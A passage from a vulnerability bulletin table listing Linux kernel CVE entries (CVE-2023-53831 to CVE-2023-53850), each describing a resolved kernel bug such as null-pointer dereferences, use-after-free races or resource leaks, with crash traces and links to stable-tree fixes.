[<ffffffff8507734f>] ip6_finish_output2+0x33f/0x1ae0 net/ipv6/ip6_output.c:83 [<ffffffff85062766>] __ip6_finish_output net/ipv6/ip6_output.c:200 [inline] [<ffffffff85062766>] ip6_finish_output+0x6c6/0xb10 net/ipv6/ip6_output.c:211 [<ffffffff85061f8c>] NF_HOOK_COND include/linux/netfilter.h:298 [inline] [<ffffffff85061f8c>] ip6_output+0x2bc/0x3d0 net/ipv6/ip6_output.c:232 [<ffffffff852071cf>] dst_output include/net/dst.h:444 [inline] [<ffffffff852071cf>] ip6_local_out+0x10f/0x140 net/ipv6/output_core.c:161 [<ffffffff83618fb4>] ipvlan_process_v6_outbound drivers/net/ipvlan/ipvlan_core.c:483 [inline] [<ffffffff83618fb4>] ipvlan_process_outbound drivers/net/ipvlan/ipvlan_core.c:529 [inline] [<ffffffff83618fb4>] ipvlan_xmit_mode_l3 drivers/net/ipvlan/ipvlan_core.c:602 [inline] [<ffffffff83618fb4>] ipvlan_queue_xmit+0x1174/0x1be0 drivers/net/ipvlan/ipvlan_core.c:677 [<ffffffff8361ddd9>] ipvlan_start_xmit+0x49/0x100 drivers/net/ipvlan/ipvlan_main.c:229 [<ffffffff84763fc0>] netdev_start_xmit include/linux/netdevice.h:4925 [inline] [<ffffffff84763fc0>] xmit_one net/core/dev.c:3644 [inline] [<ffffffff84763fc0>] dev_hard_start_xmit+0x320/0x980 net/core/dev.c:3660 [<ffffffff8494c650>] sch_direct_xmit+0x2a0/0x9c0 net/sched/sch_generic.c:342 [<ffffffff8494d883>] qdisc_restart net/sched/sch_generic.c:407 [inline] [<ffffffff8494d883>] __qdisc_run+0xb13/0x1e70 net/sched/sch_generic.c:415 [<ffffffff8478c426>] qdisc_run+0xd6/0x260 include/net/pkt_sched.h:125 [<ffffffff84796eac>] net_tx_action+0x7ac/0x940 net/core/dev.c:5247 [<ffffffff858002bd>] __do_softirq+0x2bd/0x9bd kernel/softirq.c:599 [<ffffffff814c3fe8>] invoke_softirq kernel/softirq.c:430 [inline] [<ffffffff814c3fe8>] __irq_exit_rcu+0xc8/0x170 kernel/softirq.c:683 [<ffffffff814c3f09>] irq_exit_rcu+0x9/0x20 kernel/softirq.c:695 | 2025-12-09 | not yet calculated | CVE-2023-53831 | https://git.kernel.org/stable/c/7586a66b9c4f1b8a825ea1dfa3a91aad5cc7b89b https://git.kernel.org/stable/c/e918d0211ffbaf039447334c3460cafee1ce0157 https://git.kernel.org/stable/c/41f10a4d78fe69d685a3172e6884297f233dcf95 https://git.kernel.org/stable/c/895dc4c47171a20035cdaa8d74c1c1e97f2fc974 https://git.kernel.org/stable/c/ed4e0adfa407ab65dd73b8862ebf2f308a0349d2 https://git.kernel.org/stable/c/9036b6342fcdab190d6edce3dd447859c1de90fc https://git.kernel.org/stable/c/b1f5b890b89cb38a6c0bac91984d56cd69808e8c https://git.kernel.org/stable/c/a3e0fdf71bbe031de845e8e08ed7fba49f9c702c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix null-ptr-deref in raid10_sync_request init_resync() inits mempool and sets conf->have_replacemnt at the beginning of sync, close_sync() frees the mempool when sync is completed. After [1] recovery might be skipped and init_resync() is called but close_sync() is not. null-ptr-deref occurs with r10bio->dev[i].repl_bio. The following is one way to reproduce the issue. 1) create a array, wait for resync to complete, mddev->recovery_cp is set to MaxSector. 2) recovery is woken and it is skipped. conf->have_replacement is set to 0 in init_resync(). close_sync() not called. 3) some io errors and rdev A is set to WantReplacement. 4) a new device is added and set to A's replacement. 5) recovery is woken, A have replacement, but conf->have_replacemnt is 0. r10bio->dev[i].repl_bio will not be alloced and null-ptr-deref occurs. Fix it by not calling init_resync() if recovery skipped. [1] commit 7e83ccbecd60 ("md/raid10: Allow skipping recovery when clean arrays are assembled") | 2025-12-09 | not yet calculated | CVE-2023-53832 | https://git.kernel.org/stable/c/38d33593260536840b49fd1dcac9aedfd14a9d42 https://git.kernel.org/stable/c/14964127be77884003976a392c9faa9ebaabbbe1 https://git.kernel.org/stable/c/bdbf104b1c91fbf38f82c522ebf75429f094292a https://git.kernel.org/stable/c/68695084077e3de9d3e94e09238ace2b6f246446 https://git.kernel.org/stable/c/b50fd1c3d9d0175aa29ff2706ef36cc178bc356a https://git.kernel.org/stable/c/99b503e4edc5938885d839cf0e7571963f75d800 https://git.kernel.org/stable/c/9e9efc77efd1956cc244af975240f2513d78a371 https://git.kernel.org/stable/c/a405c6f0229526160aa3f177f65e20c86fce84c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915: Fix NULL ptr deref by checking new_crtc_state intel_atomic_get_new_crtc_state can return NULL, unless crtc state wasn't obtained previously with intel_atomic_get_crtc_state, so we must check it for NULLness here, just as in many other places, where we can't guarantee that intel_atomic_get_crtc_state was called. We are currently getting NULL ptr deref because of that, so this fix was confirmed to help. (cherry picked from commit 1d5b09f8daf859247a1ea65b0d732a24d88980d8) | 2025-12-09 | not yet calculated | CVE-2023-53833 | https://git.kernel.org/stable/c/dbf25cc21beff4fd2e730573845a266504b21bb2 https://git.kernel.org/stable/c/8b3c0d2d1685ba40b0af4ee1f8d8824a73870f88 https://git.kernel.org/stable/c/a41d985902c153c31c616fe183cf2ee331e95ecb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: adc: ina2xx: avoid NULL pointer dereference on OF device match The affected lines were resulting in a NULL pointer dereference on our platform because the device tree contained the following list of compatible strings: power-sensor@40 { compatible = "ti,ina232", "ti,ina231"; ... }; Since the driver doesn't declare a compatible string "ti,ina232", the OF matching succeeds on "ti,ina231". But the I2C device ID info is populated via the first compatible string, cf. modalias population in of_i2c_get_board_info(). Since there is no "ina232" entry in the legacy I2C device ID table either, the struct i2c_device_id *id pointer in the probe function is NULL. Fix this by using the already populated type variable instead, which points to the proper driver data. Since the name is also wanted, add a generic one to the ina2xx_config table. | 2025-12-09 | not yet calculated | CVE-2023-53834 | https://git.kernel.org/stable/c/a8e2ae6296d56478fb98ae7f739846ed121f154f https://git.kernel.org/stable/c/77b689cc27d489b75d33f1a368356d70eb0ce08c https://git.kernel.org/stable/c/13f3ce53b65aa8b44cad7039d31e62c9ffd6c5d1 https://git.kernel.org/stable/c/a41e19cc0d6b6a445a4133170b90271e4a2553dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Fix skb refcnt race after locking changes There is a race where skb's from the sk_psock_backlog can be referenced after userspace side has already skb_consumed() the sk_buff and its refcnt dropped to zer0 causing use after free. The flow is the following: while ((skb = skb_peek(&psock->ingress_skb)) sk_psock_handle_Skb(psock, skb, ..., ingress) if (!ingress) ... sk_psock_skb_ingress sk_psock_skb_ingress_enqueue(skb) msg->skb = skb sk_psock_queue_msg(psock, msg) skb_dequeue(&psock->ingress_skb) The sk_psock_queue_msg() puts the msg on the ingress_msg queue. This is what the application reads when recvmsg() is called. An application can read this anytime after the msg is placed on the queue. The recvmsg hook will also read msg->skb and then after user space reads the msg will call consume_skb(skb) on it effectively free'ing it. But, the race is in above where backlog queue still has a reference to the skb and calls skb_dequeue(). If the skb_dequeue happens after the user reads and free's the skb we have a use after free. The !ingress case does not suffer from this problem because it uses sendmsg_*(sk, msg) which does not pass the sk_buff further down the stack. The following splat was observed with 'test_progs -t sockmap_listen': [ 1022.710250][ T2556] general protection fault, ... [...] [ 1022.712830][ T2556] Workqueue: events sk_psock_backlog [ 1022.713262][ T2556] RIP: 0010:skb_dequeue+0x4c/0x80 [ 1022.713653][ T2556] Code: ... [...] [ 1022.720699][ T2556] Call Trace: [ 1022.720984][ T2556] <TASK> [ 1022.721254][ T2556] ? die_addr+0x32/0x80^M [ 1022.721589][ T2556] ? exc_general_protection+0x25a/0x4b0 [ 1022.722026][ T2556] ? asm_exc_general_protection+0x22/0x30 [ 1022.722489][ T2556] ? skb_dequeue+0x4c/0x80 [ 1022.722854][ T2556] sk_psock_backlog+0x27a/0x300 [ 1022.723243][ T2556] process_one_work+0x2a7/0x5b0 [ 1022.723633][ T2556] worker_thread+0x4f/0x3a0 [ 1022.723998][ T2556] ? __pfx_worker_thread+0x10/0x10 [ 1022.724386][ T2556] kthread+0xfd/0x130 [ 1022.724709][ T2556] ? __pfx_kthread+0x10/0x10 [ 1022.725066][ T2556] ret_from_fork+0x2d/0x50 [ 1022.725409][ T2556] ? __pfx_kthread+0x10/0x10 [ 1022.725799][ T2556] ret_from_fork_asm+0x1b/0x30 [ 1022.726201][ T2556] </TASK> To fix we add an skb_get() before passing the skb to be enqueued in the engress queue. This bumps the skb->users refcnt so that consume_skb() and kfree_skb will not immediately free the sk_buff. With this we can be sure the skb is still around when we do the dequeue. Then we just need to decrement the refcnt or free the skb in the backlog case which we do by calling kfree_skb() on the ingress case as well as the sendmsg case. Before locking change from fixes tag we had the sock locked so we couldn't race with user and there was no issue here. | 2025-12-09 | not yet calculated | CVE-2023-53836 | https://git.kernel.org/stable/c/65ad600b9bde68d2d28709943ab00b51ca8f0a1d https://git.kernel.org/stable/c/923877254f002ae87d441382bb1096d9e773d56d https://git.kernel.org/stable/c/e6b5e47adb9166e732cdf7e6e034946e3f89f36d https://git.kernel.org/stable/c/a454d84ee20baf7bd7be90721b9821f73c7d23d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix NULL-deref on snapshot tear down In case of early initialization errors and on platforms that do not use the DPU controller, the deinitilisation code can be called with the kms pointer set to NULL. Patchwork: https://patchwork.freedesktop.org/patch/525099/ | 2025-12-09 | not yet calculated | CVE-2023-53837 | https://git.kernel.org/stable/c/8f0e1ad5327a3499e7f09157cb714302a856e8a4 https://git.kernel.org/stable/c/16e0e6fb4511c004a5a0987d5bd75d9bcfb2b175 https://git.kernel.org/stable/c/8eca32b5b92a0be956a8934d7eddf4f70c107927 https://git.kernel.org/stable/c/19fe79ae816a7e3400df1eb4d27530bf9b8ae258 https://git.kernel.org/stable/c/a465353b9250802f87b97123e33a17f51277f0b1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: synchronize atomic write aborts To fix a race condition between atomic write aborts, I use the inode lock and make COW inode to be re-usable thoroughout the whole atomic file inode lifetime. | 2025-12-09 | not yet calculated | CVE-2023-53838 | https://git.kernel.org/stable/c/102b82708c1523b36d421cb8687746906069bc17 https://git.kernel.org/stable/c/b7724360714642099cec907f54f42e55f5325453 https://git.kernel.org/stable/c/a46bebd502fe1a3bd1d22f64cedd93e7e7702693 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dccp: fix data-race around dp->dccps_mss_cache dccp_sendmsg() reads dp->dccps_mss_cache before locking the socket. Same thing in do_dccp_getsockopt(). Add READ_ONCE()/WRITE_ONCE() annotations, and change dccp_sendmsg() to check again dccps_mss_cache after socket is locked. | 2025-12-09 | not yet calculated | CVE-2023-53839 | https://git.kernel.org/stable/c/162fa1e3cfb62aa780d7c40c8cccb6c2f8bef7c1 https://git.kernel.org/stable/c/2bdc7f272b3a110a4e1fdee6c47c8d20f9b20817 https://git.kernel.org/stable/c/67eebc7a9217f999b779d46fba5312a716f0dc1d https://git.kernel.org/stable/c/6d701c95ee6463abcbb6da543060d6e444554135 https://git.kernel.org/stable/c/f239c9e1d98b313435481b4926e8bdd06197e4d8 https://git.kernel.org/stable/c/a6ddc1c774874dc704f96a99d015dc759627bba7 https://git.kernel.org/stable/c/d1f38d313bdfc52fb2f662e66d0c60dd1cfe2384 https://git.kernel.org/stable/c/a47e598fbd8617967e49d85c49c22f9fc642704c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: early: xhci-dbc: Fix a potential out-of-bound memory access If xdbc_bulk_write() fails, the values in 'buf' can be anything. So the string is not guaranteed to be NULL terminated when xdbc_trace() is called. Reserve an extra byte, which will be zeroed automatically because 'buf' is a static variable, in order to avoid troubles, should it happen. | 2025-12-09 | not yet calculated | CVE-2023-53840 | https://git.kernel.org/stable/c/e8fb0f13e45cf361fd06593d3cb2d89915cd3bd0 https://git.kernel.org/stable/c/351c8d8650d1ccc006255fa01f98b6c6496a02e5 https://git.kernel.org/stable/c/df7c8aba7309f4dc55df94e06b67f576c0f52406 https://git.kernel.org/stable/c/a4a97ab3db5c081eb6e7dba91306adefb461e0bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: devlink: report devlink_port_type_warn source device devlink_port_type_warn is scheduled for port devlink and warning when the port type is not set. But from this warning it is not easy found out which device (driver) has no devlink port set. [ 3709.975552] Type was not set for devlink port. [ 3709.975579] WARNING: CPU: 1 PID: 13092 at net/devlink/leftover.c:6775 devlink_port_type_warn+0x11/0x20 [ 3709.993967] Modules linked in: openvswitch nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nfnetlink bluetooth rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs vhost_net vhost vhost_iotlb tap tun bridge stp llc qrtr intel_rapl_msr intel_rapl_common i10nm_edac nfit libnvdimm x86_pkg_temp_thermal mlx5_ib intel_powerclamp coretemp dell_wmi ledtrig_audio sparse_keymap ipmi_ssif kvm_intel ib_uverbs rfkill ib_core video kvm iTCO_wdt acpi_ipmi intel_vsec irqbypass ipmi_si iTCO_vendor_support dcdbas ipmi_devintf mei_me ipmi_msghandler rapl mei intel_cstate isst_if_mmio isst_if_mbox_pci dell_smbios intel_uncore isst_if_common i2c_i801 dell_wmi_descriptor wmi_bmof i2c_smbus intel_pch_thermal pcspkr acpi_power_meter xfs libcrc32c sd_mod sg nvme_tcp mgag200 i2c_algo_bit nvme_fabrics drm_shmem_helper drm_kms_helper nvme syscopyarea ahci sysfillrect sysimgblt nvme_core fb_sys_fops crct10dif_pclmul libahci mlx5_core sfc crc32_pclmul nvme_common drm [ 3709.994030] crc32c_intel mtd t10_pi mlxfw libata tg3 mdio megaraid_sas psample ghash_clmulni_intel pci_hyperv_intf wmi dm_multipath sunrpc dm_mirror dm_region_hash dm_log dm_mod be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse [ 3710.108431] CPU: 1 PID: 13092 Comm: kworker/1:1 Kdump: loaded Not tainted 5.14.0-319.el9.x86_64 #1 [ 3710.108435] Hardware name: Dell Inc. PowerEdge R750/0PJ80M, BIOS 1.8.2 09/14/2022 [ 3710.108437] Workqueue: events devlink_port_type_warn [ 3710.108440] RIP: 0010:devlink_port_type_warn+0x11/0x20 [ 3710.108443] Code: 84 76 fe ff ff 48 c7 03 20 0e 1a ad 31 c0 e9 96 fd ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 48 c7 c7 18 24 4e ad e8 ef 71 62 ff <0f> 0b c3 cc cc cc cc 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f6 87 [ 3710.108445] RSP: 0018:ff3b6d2e8b3c7e90 EFLAGS: 00010282 [ 3710.108447] RAX: 0000000000000000 RBX: ff366d6580127080 RCX: 0000000000000027 [ 3710.108448] RDX: 0000000000000027 RSI: 00000000ffff86de RDI: ff366d753f41f8c8 [ 3710.108449] RBP: ff366d658ff5a0c0 R08: ff366d753f41f8c0 R09: ff3b6d2e8b3c7e18 [ 3710.108450] R10: 0000000000000001 R11: 0000000000000023 R12: ff366d753f430600 [ 3710.108451] R13: ff366d753f436900 R14: 0000000000000000 R15: ff366d753f436905 [ 3710.108452] FS: 0000000000000000(0000) GS:ff366d753f400000(0000) knlGS:0000000000000000 [ 3710.108453] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 3710.108454] CR2: 00007f1c57bc74e0 CR3: 000000111d26a001 CR4: 0000000000773ee0 [ 3710.108456] PKRU: 55555554 [ 3710.108457] Call Trace: [ 3710.108458] <TASK> [ 3710.108459] process_one_work+0x1e2/0x3b0 [ 3710.108466] ? rescuer_thread+0x390/0x390 [ 3710.108468] worker_thread+0x50/0x3a0 [ 3710.108471] ? rescuer_thread+0x390/0x390 [ 3710.108473] kthread+0xdd/0x100 [ 3710.108477] ? kthread_complete_and_exit+0x20/0x20 [ 3710.108479] ret_from_fork+0x1f/0x30 [ 3710.108485] </TASK> [ 3710.108486] ---[ end trace 1b4b23cd0c65d6a0 ]--- After patch: [ 402.473064] ice 0000:41:00.0: Type was not set for devlink port. [ 402.473064] ice 0000:41:00.1: Type was not set for devlink port. | 2025-12-09 | not yet calculated | CVE-2023-53841 | https://git.kernel.org/stable/c/970c7035f4b03c7be9f49c403ccf6fb0b70039a1 https://git.kernel.org/stable/c/2864cc9a1fd13666ed7fd9064dc3f2c51a85de32 https://git.kernel.org/stable/c/7552020e3aa8283b215ca6b3840e6f9281ee4664 https://git.kernel.org/stable/c/408d40c729cbe3a918a381405df769491a472122 https://git.kernel.org/stable/c/21b9e0efb38eac1fe7bed369e96980cad45aa9c7 https://git.kernel.org/stable/c/a52305a81d6bb74b90b400dfa56455d37872fe4b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: codecs: wcd-mbhc-v2: fix resource leaks on component remove The MBHC resources must be released on component probe failure and removal so can not be tied to the lifetime of the component device. This is specifically needed to allow probe deferrals of the sound card which otherwise fails when reprobing the codec component: snd-sc8280xp sound: ASoC: failed to instantiate card -517 genirq: Flags mismatch irq 299. 00002001 (mbhc sw intr) vs. 00002001 (mbhc sw intr) wcd938x_codec audio-codec: Failed to request mbhc interrupts -16 wcd938x_codec audio-codec: mbhc initialization failed wcd938x_codec audio-codec: ASoC: error at snd_soc_component_probe on audio-codec: -16 snd-sc8280xp sound: ASoC: failed to instantiate card -16 | 2025-12-09 | not yet calculated | CVE-2023-53842 | https://git.kernel.org/stable/c/90ab6446eb522e31421b77bf8f45714f5668f9a3 https://git.kernel.org/stable/c/17feff71d06c96dea1fa72451c20d411e9d5ac8f https://git.kernel.org/stable/c/ce4059e1c0aca972446e06c09ee09a0d2ba5df54 https://git.kernel.org/stable/c/a5475829adcc600bc69ee9ff7c9e3e43fb4f8d30 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: reject negative ifindex Recent changes in net-next (commit 759ab1edb56c ("net: store netdevs in an xarray")) refactored the handling of pre-assigned ifindexes and let syzbot surface a latent problem in ovs. ovs does not validate ifindex, making it possible to create netdev ports with negative ifindex values. It's easy to repro with YNL: $ ./cli.py --spec netlink/specs/ovs_datapath.yaml \ --do new \ --json '{"upcall-pid": 1, "name":"my-dp"}' $ ./cli.py --spec netlink/specs/ovs_vport.yaml \ --do new \ --json '{"upcall-pid": "00000001", "name": "some-port0", "dp-ifindex":3,"ifindex":4294901760,"type":2}' $ ip link show -65536: some-port0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000 link/ether 7a:48:21:ad:0b:fb brd ff:ff:ff:ff:ff:ff ... Validate the inputs. Now the second command correctly returns: $ ./cli.py --spec netlink/specs/ovs_vport.yaml \ --do new \ --json '{"upcall-pid": "00000001", "name": "some-port0", "dp-ifindex":3,"ifindex":4294901760,"type":2}' lib.ynl.NlError: Netlink error: Numerical result out of range nl_len = 108 (92) nl_flags = 0x300 nl_type = 2 error: -34 extack: {'msg': 'integer out of range', 'unknown': [[type:4 len:36] b'\x0c\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x03\x00\xff\xff\xff\x7f\x00\x00\x00\x00\x08\x00\x01\x00\x08\x00\x00\x00'], 'bad-attr': '.ifindex'} Accept 0 since it used to be silently ignored. | 2025-12-09 | not yet calculated | CVE-2023-53843 | https://git.kernel.org/stable/c/c965a58376146dcfdda186819462e8eb3aadef3a https://git.kernel.org/stable/c/881faff9e548a7ddfb11595be7c1c649217d27db https://git.kernel.org/stable/c/a552bfa16bab4ce901ee721346a28c4e483f4066 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Don't leak a resource on swapout move error If moving the bo to system for swapout failed, we were leaking a resource. Fix. | 2025-12-09 | not yet calculated | CVE-2023-53844 | https://git.kernel.org/stable/c/af4e0ce2af8a8f0ff3b89702a1e18d8ec2c4a834 https://git.kernel.org/stable/c/f037f6038736bd038ddb9c72de979a08cc1ee3b5 https://git.kernel.org/stable/c/4a5b37ea6797d7a53e6dd004aa37e149f40199ce https://git.kernel.org/stable/c/a590f03d8de7c4cb7ce4916dc7f2fd10711faabe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix infinite loop in nilfs_mdt_get_block() If the disk image that nilfs2 mounts is corrupted and a virtual block address obtained by block lookup for a metadata file is invalid, nilfs_bmap_lookup_at_level() may return the same internal return code as -ENOENT, meaning the block does not exist in the metadata file. This duplication of return codes confuses nilfs_mdt_get_block(), causing it to read and create a metadata block indefinitely. In particular, if this happens to the inode metadata file, ifile, semaphore i_rwsem can be left held, causing task hangs in lock_mount. Fix this issue by making nilfs_bmap_lookup_at_level() treat virtual block address translation failures with -ENOENT as metadata corruption instead of returning the error code. | 2025-12-09 | not yet calculated | CVE-2023-53845 | https://git.kernel.org/stable/c/cfb0bb4fbd40c1f06da7e9f88c0a2d46155b90c2 https://git.kernel.org/stable/c/d536f9976bb04e9c84cf80045a9355975e418f41 https://git.kernel.org/stable/c/fe1cbbcb1a2532ee1654e1ff121be8906d83c6f0 https://git.kernel.org/stable/c/8a89d36a07afe1ed4564df51fefa2bb556c85412 https://git.kernel.org/stable/c/8d07d9119642ba43d21f8ba64d51d01931096b20 https://git.kernel.org/stable/c/25457d07c8146e57d28906c663def033dc425af6 https://git.kernel.org/stable/c/34c5f17222b50c79848bb03ec8811648813e6a45 https://git.kernel.org/stable/c/5b29661669cb65b9750a3cf70ed3eaf947b92167 https://git.kernel.org/stable/c/a6a491c048882e7e424d407d32cba0b52d9ef2bf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to do sanity check on direct node in truncate_dnode() syzbot reports below bug: BUG: KASAN: slab-use-after-free in f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574 Read of size 4 at addr ffff88802a25c000 by task syz-executor148/5000 CPU: 1 PID: 5000 Comm: syz-executor148 Not tainted 6.4.0-rc7-syzkaller-00041-ge660abd551f1 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106 print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351 print_report mm/kasan/report.c:462 [inline] kasan_report+0x11c/0x130 mm/kasan/report.c:572 f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574 truncate_dnode+0x229/0x2e0 fs/f2fs/node.c:944 f2fs_truncate_inode_blocks+0x64b/0xde0 fs/f2fs/node.c:1154 f2fs_do_truncate_blocks+0x4ac/0xf30 fs/f2fs/file.c:721 f2fs_truncate_blocks+0x7b/0x300 fs/f2fs/file.c:749 f2fs_truncate.part.0+0x4a5/0x630 fs/f2fs/file.c:799 f2fs_truncate include/linux/fs.h:825 [inline] f2fs_setattr+0x1738/0x2090 fs/f2fs/file.c:1006 notify_change+0xb2c/0x1180 fs/attr.c:483 do_truncate+0x143/0x200 fs/open.c:66 handle_truncate fs/namei.c:3295 [inline] do_open fs/namei.c:3640 [inline] path_openat+0x2083/0x2750 fs/namei.c:3791 do_filp_open+0x1ba/0x410 fs/namei.c:3818 do_sys_openat2+0x16d/0x4c0 fs/open.c:1356 do_sys_open fs/open.c:1372 [inline] __do_sys_creat fs/open.c:1448 [inline] __se_sys_creat fs/open.c:1442 [inline] __x64_sys_creat+0xcd/0x120 fs/open.c:1442 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The root cause is, inodeA references inodeB via inodeB's ino, once inodeA is truncated, it calls truncate_dnode() to truncate data blocks in inodeB's node page, it traverse mapping data from node->i.i_addr[0] to node->i.i_addr[ADDRS_PER_BLOCK() - 1], result in out-of-boundary access. This patch fixes to add sanity check on dnode page in truncate_dnode(), so that, it can help to avoid triggering such issue, and once it encounters such issue, it will record newly introduced ERROR_INVALID_NODE_REFERENCE error into superblock, later fsck can detect such issue and try repairing. Also, it removes f2fs_truncate_data_blocks() for cleanup due to the function has only one caller, and uses f2fs_truncate_data_blocks_range() instead. | 2025-12-09 | not yet calculated | CVE-2023-53846 | https://git.kernel.org/stable/c/af0f716ad3b039cab9d426da63a5ee6c88751185 https://git.kernel.org/stable/c/a6ec83786ab9f13f25fb18166dee908845713a95 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb-storage: alauda: Fix uninit-value in alauda_check_media() Syzbot got KMSAN to complain about access to an uninitialized value in the alauda subdriver of usb-storage: BUG: KMSAN: uninit-value in alauda_transport+0x462/0x57f0 drivers/usb/storage/alauda.c:1137 CPU: 0 PID: 12279 Comm: usb-storage Not tainted 5.3.0-rc7+ #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011 Call Trace: __dump_stack lib/dump_stack.c:77 [inline] dump_stack+0x191/0x1f0 lib/dump_stack.c:113 kmsan_report+0x13a/0x2b0 mm/kmsan/kmsan_report.c:108 __msan_warning+0x73/0xe0 mm/kmsan/kmsan_instr.c:250 alauda_check_media+0x344/0x3310 drivers/usb/storage/alauda.c:460 The problem is that alauda_check_media() doesn't verify that its USB transfer succeeded before trying to use the received data. What should happen if the transfer fails isn't entirely clear, but a reasonably conservative approach is to pretend that no media is present. A similar problem exists in a usb_stor_dbg() call in alauda_get_media_status(). In this case, when an error occurs the call is redundant, because usb_stor_ctrl_transfer() already will print a debugging message. Finally, unrelated to the uninitialized memory access, is the fact that alauda_check_media() performs DMA to a buffer on the stack. Fortunately usb-storage provides a general purpose DMA-able buffer for uses like this. We'll use it instead. | 2025-12-09 | not yet calculated | CVE-2023-53847 | https://git.kernel.org/stable/c/153c3e85873cc3e2f387169783c3a227bad9a95a https://git.kernel.org/stable/c/49d380bcd6cba987c6085fae6464c9c087e8d9a0 https://git.kernel.org/stable/c/044f4446e06bb03c52216697b14867ebc555ad3b https://git.kernel.org/stable/c/fe7c3a445d22783d27fe8bd0521a8aab1eb9da65 https://git.kernel.org/stable/c/7a11d1e2625bdb2346f6586773b20b20977278ac https://git.kernel.org/stable/c/0d2d5282d39aed6f27dfe1ed60a5f3934ebd21cd https://git.kernel.org/stable/c/373e0ab8c4c516561493f1acf367c7ee7dc053c2 https://git.kernel.org/stable/c/a6ff6e7a9dd69364547751db0f626a10a6d628d2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5-cache: fix a deadlock in r5l_exit_log() Commit b13015af94cf ("md/raid5-cache: Clear conf->log after finishing work") introduce a new problem: // caller hold reconfig_mutex r5l_exit_log flush_work(&log->disable_writeback_work) r5c_disable_writeback_async wait_event /* * conf->log is not NULL, and mddev_trylock() * will fail, wait_event() can never pass. */ conf->log = NULL Fix this problem by setting 'config->log' to NULL before wake_up() as it used to be, so that wait_event() from r5c_disable_writeback_async() can exist. In the meantime, move forward md_unregister_thread() so that null-ptr-deref this commit fixed can still be fixed. | 2025-12-09 | not yet calculated | CVE-2023-53848 | https://git.kernel.org/stable/c/ac9e103f282a7854f3274ef5ff0742fbbe8d7d6b https://git.kernel.org/stable/c/71cf23271f015a57038bdc4669952096f9fe5500 https://git.kernel.org/stable/c/c406984738215dc20ac2dc63e49d70f20797730e https://git.kernel.org/stable/c/a705b11b358dee677aad80630e7608b2d5f56691 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm: fix workqueue leak on bind errors Make sure to destroy the workqueue also in case of early errors during bind (e.g. a subcomponent failing to bind). Since commit c3b790ea07a1 ("drm: Manage drm_mode_config_init with drmm_") the mode config will be freed when the drm device is released also when using the legacy interface, but add an explicit cleanup for consistency and to facilitate backporting. Patchwork: https://patchwork.freedesktop.org/patch/525093/ | 2025-12-09 | not yet calculated | CVE-2023-53849 | https://git.kernel.org/stable/c/6e1476225ec02eeebc4b79f793506f80bc4bca8f https://git.kernel.org/stable/c/28e34db2f3e0130872e2384dd9df9f82bd89e967 https://git.kernel.org/stable/c/8551c4b7c8ffb42f759547e5c39da5980abf2432 https://git.kernel.org/stable/c/a75b49db6529b2af049eafd938fae888451c3685 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: use internal state to free traffic IRQs If the system tries to close the netdev while iavf_reset_task() is running, __LINK_STATE_START will be cleared and netif_running() will return false in iavf_reinit_interrupt_scheme(). This will result in iavf_free_traffic_irqs() not being called and a leak as follows: [7632.489326] remove_proc_entry: removing non-empty directory 'irq/999', leaking at least 'iavf-enp24s0f0v0-TxRx-0' [7632.490214] WARNING: CPU: 0 PID: 10 at fs/proc/generic.c:718 remove_proc_entry+0x19b/0x1b0 is shown when pci_disable_msix() is later called. Fix by using the internal adapter state. The traffic IRQs will always exist if state == __IAVF_RUNNING. | 2025-12-09 | not yet calculated | CVE-2023-53850 | https://git.kernel.org/stable/c/6d9d01689b82ff5cb8f8d2a82717d7997bc0bfff https://git.kernel.org/stable/c/5e9db32eec628481f5da97a5b1aedb84a5240d18 https://git.kernel.org/stable/c/a77ed5c5b768e9649be240a2d864e5cd9c6a2015 |
